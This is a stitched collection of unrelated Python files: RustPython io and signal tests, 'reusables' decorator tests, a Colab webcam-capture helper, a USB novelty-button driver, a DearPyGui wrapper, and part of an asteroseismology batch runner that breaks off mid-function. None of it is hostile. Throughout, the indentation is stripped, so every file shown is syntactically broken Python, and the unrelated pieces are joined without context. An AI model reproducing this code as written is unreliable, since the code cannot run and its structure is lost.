# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
@unittest.skip("TODO: RUSTPYTHON, hangs?")
def test_interrupted_write_text(self):
super().test_interrupted_write_text()
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
    all_members = io.__all__  # + ["IncrementalNewlineDecoder"] XXX RUSTPYTHON
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
test_wrappers.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import os
from .common_test_data import *
from reusables import (
unique,
lock_it,
time_it,
queue_it,
setup_logger,
log_exception,
remove_file_handlers,
retry_it,
catch_it,
ReusablesError,
)
@unique(exception=OSError, error_text="WHY ME!")
def unique_function_1(a):
return a
@unique(alt_return=33)
def unique_function_2(a):
return a
@unique(wait=1)
def unique_function_3():
return int(time.time())
class TestWrappers(BaseTestClass):
@classmethod
def tearDownClass(cls):
try:
os.unlink("out.log")
except OSError:
pass
def test_unique(self):
unique_function_1(1)
unique_function_2(1)
try:
unique_function_1(1)
except OSError as err:
assert "WHY ME!" in str(err)
assert unique_function_2(1) == 33
a = unique_function_3()
b = unique_function_3()
c = unique_function_3()
assert c > b > a
def test_locker(self):
import threading
@lock_it()
def func1():
import time
time.sleep(2)
start = time.time()
a = threading.Thread(target=func1)
b = threading.Thread(target=func1)
a.daemon = False
b.daemon = False
a.start()
b.start()
a.join()
b.join()
assert (time.time() - start) > 3
def test_time(self):
my_list = []
@time_it(append=my_list)
def func():
return 5 + 3
@time_it(log=True)
def func2():
return 7 + 3
func()
func2()
assert len(my_list) == 1
assert isinstance(my_list[0], float)
def test_queue(self):
try:
import queue
except ImportError:
import Queue as queue
q = queue.Queue()
@queue_it(q)
def func():
return 5 + 3
func()
assert q.get() == 8
def test_log_exception(self):
"""
Validate the custom log exception is raised correctly.
"""
@log_exception()
def unique_function_4():
raise Exception("Bad")
try:
unique_function_4()
except Exception as err:
assert "Bad" in str(err)
def test_log_exception_message(self):
"""
Validate the message passed to the custom log exception is written
correctly in the logs.
"""
setup_logger("my_logger", file_path="out.log")
message = "I would like to take this moment to say something " "interesting has happened. "
@log_exception("my_logger", message=message)
def unique_function_5():
raise Exception("Interesting")
try:
unique_function_5()
except Exception:
pass
remove_file_handlers("my_logger")
with open(os.path.join("out.log"), "r") as f:
assert message in f.readlines()[0]
os.remove(os.path.join("out.log"))
def test_retry_it(self):
@retry_it()
def a():
return True
def handle(herg):
return False
@retry_it(tries=2, wait=1, handler=handle)
def b(a, b=True):
raise Exception("Not yet")
assert a() is True
try:
b()
except ReusablesError:
pass
else:
raise AssertionError("Should have failed")
def test_catch_it(self):
def handle(*args, **kwargs):
print(args, kwargs)
return 10
@catch_it(handler=handle)
def ouch():
raise Exception("Wamp wamp")
@catch_it()
def b(a, b=True):
raise Exception("Not yet")
b()
assert ouch() == 10
if __name__ == "__main__":
unittest.main()
|
main.py
|
# author: Bartlomiej "furas" Burek (https://blog.furas.pl)
# date: 2022.05.10
# [python - OpenCV (-215:Assertion failed) !_src.empty() in function 'cvtColor - Stack Overflow](https://stackoverflow.com/questions/60551469/opencv-215assertion-failed-src-empty-in-function-cvtcolor/60551714)
# Google Colab: https://colab.research.google.com/drive/1a2seyb864Aqpu13nBjGRJK0AIU7JOdJa?usp=sharing
#
# based on: https://colab.research.google.com/notebooks/snippets/advanced_outputs.ipynb#scrollTo=2viqYx97hPMi
#
from IPython.display import display, Javascript
from google.colab.output import eval_js
from base64 import b64decode, b64encode
import numpy as np
import cv2  # used below by take_frame() / show_frame() to decode/encode frames
def init_camera():
"""Create objects and functions in HTML/JavaScript to access local web camera"""
js = Javascript('''
// global variables to use in both functions
var div = null;
var video = null; // <video> to display stream from local webcam
var stream = null; // stream from local webcam
var canvas = null; // <canvas> for single frame from <video> and convert frame to JPG
var img = null; // <img> to display JPG after processing with `cv2`
async function initCamera() {
// place for video (and eventually buttons)
div = document.createElement('div');
document.body.appendChild(div);
// <video> to display video
video = document.createElement('video');
video.style.display = 'block';
div.appendChild(video);
    // get webcam stream and assign it to <video>
stream = await navigator.mediaDevices.getUserMedia({video: true});
video.srcObject = stream;
// start playing stream from webcam in <video>
await video.play();
// Resize the output to fit the video element.
google.colab.output.setIframeHeight(document.documentElement.scrollHeight, true);
// <canvas> for frame from <video>
canvas = document.createElement('canvas');
canvas.width = video.videoWidth;
canvas.height = video.videoHeight;
    //div.appendChild(canvas); // there is no need to display the canvas to get the image (but you can display it for testing)
// <img> for image after processing with `cv2`
img = document.createElement('img');
img.width = video.videoWidth;
img.height = video.videoHeight;
div.appendChild(img);
}
async function takeImage(quality) {
// draw frame from <video> on <canvas>
canvas.getContext('2d').drawImage(video, 0, 0);
// stop webcam stream
//stream.getVideoTracks()[0].stop();
// get data from <canvas> as JPG image decoded base64 and with header "data:image/jpg;base64,"
return canvas.toDataURL('image/jpeg', quality);
//return canvas.toDataURL('image/png', quality);
}
async function showImage(image) {
// it needs string "data:image/jpg;base64,JPG-DATA-ENCODED-BASE64"
// it will replace previous image in `<img src="">`
img.src = image;
    // TODO: create <img> if it doesn't exist,
// TODO: use `id` to use different `<img>` for different image - like `name` in `cv2.imshow(name, image)`
}
''')
display(js)
eval_js('initCamera()')
def take_frame(quality=0.8):
"""Get frame from web camera"""
data = eval_js('takeImage({})'.format(quality)) # run JavaScript code to get image (JPG as string base64) from <canvas>
header, data = data.split(',') # split header ("data:image/jpg;base64,") and base64 data (JPG)
data = b64decode(data) # decode base64
data = np.frombuffer(data, dtype=np.uint8) # create numpy array with JPG data
img = cv2.imdecode(data, cv2.IMREAD_UNCHANGED) # uncompress JPG data to array of pixels
return img
def show_frame(img, quality=0.8):
"""Put frame as <img src="data:image/jpg;base64,...."> """
ret, data = cv2.imencode('.jpg', img) # compress array of pixels to JPG data
data = b64encode(data) # encode base64
data = data.decode() # convert bytes to string
data = 'data:image/jpg;base64,' + data # join header ("data:image/jpg;base64,") and base64 data (JPG)
eval_js('showImage("{}")'.format(data)) # run JavaScript code to put image (JPG as string base64) in <img>
# argument in `showImage` needs `" "`
print("[INFO] defined: init_camera(), take_frame(), show_frame()")
#----------------------------------------------------------------------------------------------------------------------
# class similar to `cv2.VideoCapture(src=0)`
# but it uses JavaScript function to get frame from web browser canvas
import cv2
class BrowserVideoCapture():
width = 640
height = 480
fps = 30
frames_count = 100
pos_frames = 0
def __init__(self, src=None):
# init JavaScript code
init_camera()
#self.pos_frames = 0
def read(self):
# value for `cv2.CAP_PROP_POS_FRAMES`
self.pos_frames += 1
# return the frame most recently read from JS function
return True, take_frame()
def get(self, key):
# get WIDTH, HEIGHT, FPS, etc.
if key == cv2.CAP_PROP_POS_FRAMES: # 1
return self.pos_frames
elif key == cv2.CAP_PROP_FRAME_WIDTH: # 3
return self.width
elif key == cv2.CAP_PROP_FRAME_HEIGHT: # 4
return self.height
elif key == cv2.CAP_PROP_FPS: # 5
return self.fps
elif key == cv2.CAP_PROP_FRAME_COUNT: # 7
return self.frames_count # ??
else:
print('[BrowserVideoCapture] get(key): unknown key:', key)
print('See: https://docs.opencv.org/3.4/d4/d15/group__videoio__flags__base.html')
return 0
#def set(self, key, val):
# # set WIDTH, HEIGHT, FPS, etc.
# if key == cv2.CAP_PROP_FRAME_WIDTH:
# self.width = val
# elif key == cv2.CAP_PROP_FRAME_HEIGHT:
# self.height = val
# elif key == cv2.CAP_PROP_FPS:
# self.fps = val
# else:
# print('[BrowserVideoCapture] set(key, val): unknown key:', key)
# print('See: https://docs.opencv.org/3.4/d4/d15/group__videoio__flags__base.html')
print("[INFO] defined: BrowserVideoCapture()")
#----------------------------------------------------------------------------------------------------------------------
#
# example how to use `BrowserVideoCapture` in `BrowserWebcamVideoStream`
# but I didn't test it because `scenedetect` doesn't need `BrowserWebcamVideoStream`.
# `scenedetect` needs `cv2.VideoCapture` or `BrowserVideoCapture`
# which have `read()` and also `get(key)`.
# maybe if you would add `.get(key)` like in `BrowserVideoCapture()`
# then you could use `BrowserWebcamVideoStream()` instead of `cv2.VideoCapture`
#
from threading import Thread
import cv2
# class similar to WebcamVideoStream
class BrowserWebcamVideoStream():
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
#self.stream = BrowserVideoCapture(0) # argument is not used
self.stream = BrowserVideoCapture()
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
        # I don't call `take_frame()` directly,
# but I use `read()` from `BrowserVideoCapture()`
# which runs `take_frame()`.
return self.stream.read()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
print("[INFO] defined: BrowserWebcamVideoStream()")
#----------------------------------------------------------------------------------------------------------------------
import cv2
# - code -
#vs = BrowserWebcamVideoStream(src=0) # instead of `WebcamVideoStream`
#vs.start()
#cap = cv2.VideoCapture('Our Story.mp4', 0) # video on server
cap = BrowserVideoCapture(src=0)
while True:
ret, frame = cap.read()
if ret:
        # note: the origin is the bottom-left corner of the text, so it must lie inside the frame to be visible
        frame = cv2.putText(frame, "Hello World!", (10, 40), cv2.FONT_HERSHEY_PLAIN, 2, (255, 255, 255), 2)
show_frame(frame)
|
button.py
|
import datetime
import threading
from typing import Callable
import usb
from py_dream_cheeky import DreamCheekyThread, EventType, DreamCheekyEvent
BUTTON_VENDOR_ID = 0x1d34
BUTTON_PRODUCT_ID = 0x000d
def find_button_devices():
return list(usb.core.find(find_all=True, idVendor=BUTTON_VENDOR_ID, idProduct=BUTTON_PRODUCT_ID))
class ButtonEventType(EventType):
BUTTON_PRESS = "press"
BUTTON_RELEASE = "release"
BUTTON_CLICK = "click"
BUTTON_HOLD = "hold"
BUTTON_DOUBLE_CLICK = "double click"
LID_OPEN = "lid open"
LID_CLOSE = "lid close"
class DreamCheekyButtonThread(DreamCheekyThread):
"""A DreamCheekyButtonThread detects lid/button events for a single button device.
:param device: A USB button device to monitor. If None, then the first USB button device in the system is used.
:param hold_duration: The duration in milliseconds to generate a DreamCheeky.BUTTON_HOLD event (default 1000).
:param event_handler: A function to be called asynchronously when lid and button events are generated (default None)
:param enqueue_events: If True, then ButtonEvents are added to the event queue (default False).
"""
def __init__(
self,
device: usb.core.Device = None,
event_handler: Callable[[DreamCheekyEvent], None] = None,
enqueue_events: bool = False,
hold_duration: int = 1000
):
super().__init__(device, event_handler, enqueue_events)
self.running = False
self.read_timeout = 100
self.hold_duration = datetime.timedelta(milliseconds=hold_duration)
self.double_click_delay = datetime.timedelta(milliseconds=300)
self.interface = None
self.endpoint = None
def init(self):
if self.device is None:
self.device = usb.core.find(idVendor=BUTTON_VENDOR_ID, idProduct=BUTTON_PRODUCT_ID)
if self.device is None:
raise RuntimeError('Device not found')
if self.device.is_kernel_driver_active(0):
self.device.detach_kernel_driver(0)
config = self.device.get_active_configuration()
self.interface = config[(0, 0)]
self.endpoint = usb.util.find_descriptor(
self.interface,
custom_match=lambda e: (usb.util.endpoint_direction(e.bEndpointAddress) == usb.util.ENDPOINT_IN)
)
self.running = True
def run(self):
self.init()
previous_lid_open = previous_button_pressed = False
hold_detected = False
last_press_time = last_click_time = datetime.datetime.fromtimestamp(0)
while self.running:
try:
lid_open, button_pressed = self.read_button_data()
now = datetime.datetime.now()
################################################################################
# Lid events
if lid_open and not previous_lid_open:
self.handle_event(ButtonEventType.LID_OPEN)
if not lid_open and previous_lid_open:
self.handle_event(ButtonEventType.LID_CLOSE)
################################################################################
# Button events
# Detect long hold
if button_pressed and previous_button_pressed:
if not hold_detected and now - last_press_time >= self.hold_duration:
hold_detected = True
self.handle_event(ButtonEventType.BUTTON_HOLD)
# Detect single click and double click
if not button_pressed and previous_button_pressed:
# if now - last_press_time < self.hold_duration:
if not hold_detected:
if now - last_click_time < self.double_click_delay:
self.handle_event(ButtonEventType.BUTTON_DOUBLE_CLICK)
else:
self.handle_event(ButtonEventType.BUTTON_CLICK)
last_click_time = now
if button_pressed and not previous_button_pressed:
self.handle_event(ButtonEventType.BUTTON_PRESS)
last_press_time = now
if not button_pressed and previous_button_pressed:
self.handle_event(ButtonEventType.BUTTON_RELEASE)
previous_lid_open, previous_button_pressed = lid_open, button_pressed
if not button_pressed:
hold_detected = False
except usb.core.USBError as error:
if 'Operation timed out' in error.args:
continue
usb.util.release_interface(self.device, self.interface)
self.device.attach_kernel_driver(0)
def read_button_data(self):
""" Returns (is_lid_open: bool, is_button_pressed: bool). Raises usb.core.USBError after self.read_timeout. """
self.device.ctrl_transfer(
0x21,
0x09,
0x00,
0x00,
[0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02],
0
)
data = self.device.read(
self.endpoint.bEndpointAddress,
self.endpoint.wMaxPacketSize,
self.read_timeout
)
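# The bit layout below is inferred from the return statement: bit 1 of the first
# status byte set appears to mean the lid is open, and an even value (bit 0 clear)
# appears to mean the button is currently pressed.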
return bool(data[0] & 2), not data[0] % 2
def stop(self):
self.running = False
def handle_event(self, event_type):
if not isinstance(event_type, ButtonEventType):
raise ValueError('event_type must be a ButtonEventType')
event = DreamCheekyEvent(self, self.device, event_type)
if self.enqueue_events:
self.event_queue.put_nowait(event)
if self.event_handler is not None:
t = threading.Thread(target=self.event_handler, args=(event,))
t.start()
def get_event_queue(self):
return self.event_queue
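# --- Usage sketch (not part of the original module) ---
# A minimal illustration of how DreamCheekyButtonThread might be driven. It assumes
# py_dream_cheeky is installed, a button device is attached, and that
# DreamCheekyThread is a threading.Thread subclass (suggested by the overridden
# run()), so start()/join() are available. The 10-second runtime is arbitrary.
#
#     import time
#
#     def print_event(event: DreamCheekyEvent):
#         print(event)  # inspect the generated lid/button event
#
#     thread = DreamCheekyButtonThread(event_handler=print_event)
#     thread.start()
#     time.sleep(10)   # let it report events for a short while
#     thread.stop()
#     thread.join()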
|
DearPyGuiWrapper.py
|
import time
from threading import Thread
import dearpygui.dearpygui as dpg
class DearPyGuiWrapper:
""" Wrapper for dearpygui window """
def __init__(self, title):
""" inicializacja """
self._ready = False
self._viewport_size = [1280, 720]
self._title = title
self.dpg = dpg
# Start the blocking _start_gui function in a new thread
self._gui_thread = Thread(target=self._start_gui)
self._gui_thread.start()
# self._del_callback = del_callback
# wait for the GUI thread to finish initialization
while not self._ready:
time.sleep(0.01)  # brief sleep to avoid a busy spin
def _start_gui(self):
""" Funkcja blokująca inicializuje i startuje DearPyGui """
self.dpg.create_context()
self.dpg.create_viewport(
title=self._title, width=self._viewport_size[0], height=self._viewport_size[1])
self.dpg.add_window(label="Window", tag="Window")
self.dpg.set_primary_window("Window", True)
self.dpg.set_viewport_resize_callback(self._on_resize)
self.dpg.setup_dearpygui()
self.dpg.show_viewport()
self._ready = True
with self.dpg.font_registry():
with self.dpg.font("Roboto-Regular.ttf", 16) as default_font:
self.dpg.add_font_range(0x0100, 0x017F)
self.dpg.bind_font(default_font)
self.dpg.start_dearpygui()
# call del before context gets destroyed, it won't be called automatically
self.__del__()
self.dpg.destroy_context()
def _on_resize(self, sender, app_data, user_data):
""" ustawia _viewport_size przy zmianie rozmiaru okna """
self._viewport_size = (app_data[0], app_data[1])
def get_size(self):
""" zwraca rozmiar okna """
return self._viewport_size
def get_title(self):
""" zwraca tytuł okna """
return self._title
def set_title(self, new_title):
""" ustawia tytuł okna """
self.dpg.set_viewport_title(new_title)
self._title = new_title
def __del__(self):
pass
if __name__ == "__main__":
# tests
class TestApp(DearPyGuiWrapper):
def __init__(self):
self.count = 0
DearPyGuiWrapper.__init__(self, "PipeSubs")
self.dpg.add_button(
parent="Window", callback=self.set_button_value)
def set_button_value(self, sender, app_data, user_data):
self.count += 1
self.dpg.configure_item(sender, label=str(self.count))
self.dpg.add_button(parent="Window")
app = TestApp()
|
runner.py
|
# library imports
from multiprocessing import Pool, cpu_count, Process
from copy import deepcopy
from typing import Dict, List, Tuple
import json
from os import makedirs, getcwd
import os
import traceback
import shutil
from uncertainties import ufloat, ufloat_fromstr
import time
# scientific imports
import numpy as np
# project imports
from data_handler.file_reader import load_file, look_for_file
from data_handler.data_refiner import refine_data,get_magnitude
from data_handler.signal_features import nyqFreq
from evaluators.compute_flicker import calculate_flicker_amplitude, flicker_amplitude_to_frequency
from evaluators.compute_nu_max import compute_nu_max, compute_fliper_exact
from evaluators.compute_priors import priors
from background_file_handler.fileModels.bg_file_creator import create_files
from background_file_handler.backgroundProcess import BackgroundProcess
from data_handler.write_results import save_results,is_bayes_factor_good
from res.conf_file_str import general_analysis_result_path
from support.directoryManager import cd
from support.printer import print_int, Printer
from res.conf_file_str import general_nr_of_cores, analysis_list_of_ids, general_kic, cat_analysis, cat_files, \
cat_general, cat_plot, internal_literature_value, analysis_folder_prefix, general_sequential_run, \
analysis_noise_values, internal_noise_value, analysis_number_repeats, internal_run_number, internal_delta_nu, \
internal_mag_value, internal_teff, internal_path, general_run_diamonds, internal_force_run,general_check_bayes_run,\
analysis_nr_noise_points,analysis_target_magnitude,analysis_nr_magnitude_points,internal_multiple_mag,\
analysis_nu_max_outer_guess,internal_id,analysis_file_path
from support.exceptions import ResultFileNotFound, InputFileNotFound, EvidenceFileNotFound
import uuid
def deepcopy_dict(dict_object : Dict):
cp = deepcopy(dict_object)
cp[internal_id] = str(uuid.uuid4())
return cp
def add_value_to_kwargs(kwargs, val, names, parameter, type_val):
if names[0] in val.dtype.names:
if len(names) == 2:
if names[1] in val.dtype.names:
kwargs[parameter] = type_val(val[names[0]], val[names[1]])
else:
kwargs[parameter] = type_val(val[names[0]], 0)
else:
try:
kwargs[parameter] = type_val(val[names[0]])
except AttributeError:
kwargs[parameter] = type_val(val[names[0]], 0)
return kwargs
def run(screen, file: str):
conf_list, nr_of_cores = kwarg_list(file)
Printer.total_runs = len(conf_list)
if general_sequential_run in conf_list[0]:
sequential_run = conf_list[0][general_sequential_run]
else:
sequential_run = False
if not sequential_run:
Printer.set_screen(screen)
else:
Printer.set_screen(None)
p = Process(target=Printer.run)
p.start()
if sequential_run: # macOS cannot use multiprocessing here, so fall back to running targets sequentially
for i in conf_list:
run_star(i)
else:
pool = Pool(processes=nr_of_cores)
pool.map(run_star, conf_list)
# print_int("KILL_SIR",conf_list[0])
p.join()
def kwarg_list(conf_file: str) -> Tuple[List[Dict], int]:
"""
Returns a list of configuration for the runner
:param conf_file: basic configuration filename
:return: an iterable list of configurations
"""
kwarg_list = []
conf_file_list = conf_file.split(",")
nr_of_cores = None
for kwargs_file in conf_file_list:
with open(kwargs_file, 'r') as f:
kwargs = json.load(f)
# determine number of cores
if general_nr_of_cores not in kwargs[cat_general].keys() and nr_of_cores is None:
nr_of_cores = 1
elif nr_of_cores is None:
nr_of_cores = kwargs[cat_general][general_nr_of_cores]
if nr_of_cores > cpu_count():
nr_of_cores = cpu_count()
kwargs[cat_general][general_nr_of_cores] = nr_of_cores
# Check analysis list!
if analysis_list_of_ids not in kwargs.keys():
raise ValueError(f"You need to set a list of ids to be analyzed with '{analysis_list_of_ids}'")
copy_dict = {}
# Copy all items from the general category
for key, value in kwargs[cat_general].items():
copy_dict[key] = value
# Copy all items from the file category
try:
for key, value in kwargs[cat_files].items():
copy_dict[key] = value
except KeyError:
pass
# Copy all items from the plot category
try:
for key, value in kwargs[cat_plot].items():
copy_dict[key] = value
except:
pass
# Copy all items from analysis category
for key, value in kwargs[cat_analysis].items():
copy_dict[key] = value
if ".txt" in str(kwargs[analysis_list_of_ids]):
data = np.genfromtxt(str(kwargs[analysis_list_of_ids]), names=True).T
else:
data = kwargs[analysis_list_of_ids]
if analysis_number_repeats in kwargs[cat_analysis]:
repeat = int(kwargs[cat_analysis][analysis_number_repeats]) + 1
repeat_set = True
else:
repeat = 2
repeat_set = False
try:
mag_list = [i['mag'] for i in data]
except TypeError:
data = [data] # if single target in file, we need to create a list of data to make it iterable
mag_list = [i['mag'] for i in data]
if analysis_target_magnitude in kwargs[cat_analysis]:
copy_dict[internal_multiple_mag] = True
else:
copy_dict[internal_multiple_mag] = False
for i in data:
for j in range(1, repeat):
cp = deepcopy_dict(copy_dict)
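# Columns read from the target list when present (see add_value_to_kwargs calls below):
# 'id', 'nu_max'/'nu_max_err', 'delta_nu'/'delta_nu_err', 'mag' and 'T_eff'.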
try:
cp = add_value_to_kwargs(cp, i, ['id'], general_kic, int)
cp = add_value_to_kwargs(cp, i, ['nu_max', 'nu_max_err'], internal_literature_value, ufloat)
cp = add_value_to_kwargs(cp, i, ['delta_nu', 'delta_nu_err'], internal_delta_nu, ufloat)
cp = add_value_to_kwargs(cp, i, ['mag'], internal_mag_value, float)
cp = add_value_to_kwargs(cp, i, ['T_eff'], internal_teff, float)
except:
try:
cp[general_kic] = int(i)
except:
continue
cp[internal_path] = getcwd()
# Adding working path if no absolute path was given for files
if not cp[analysis_file_path].startswith("/"):
cp[analysis_file_path] = f"{cp[internal_path]}/{cp[analysis_file_path]}"
if repeat_set:
if analysis_folder_prefix in cp:
pre = cp[analysis_folder_prefix]
else:
pre = "KIC"
cp[analysis_folder_prefix] = f"{pre}_{cp[general_kic]}/run_{j}"
cp[internal_run_number] = j
if analysis_noise_values in kwargs[cat_analysis]:
if analysis_nr_noise_points in kwargs[cat_analysis].keys():
nr = kwargs[cat_analysis][analysis_nr_noise_points]
else:
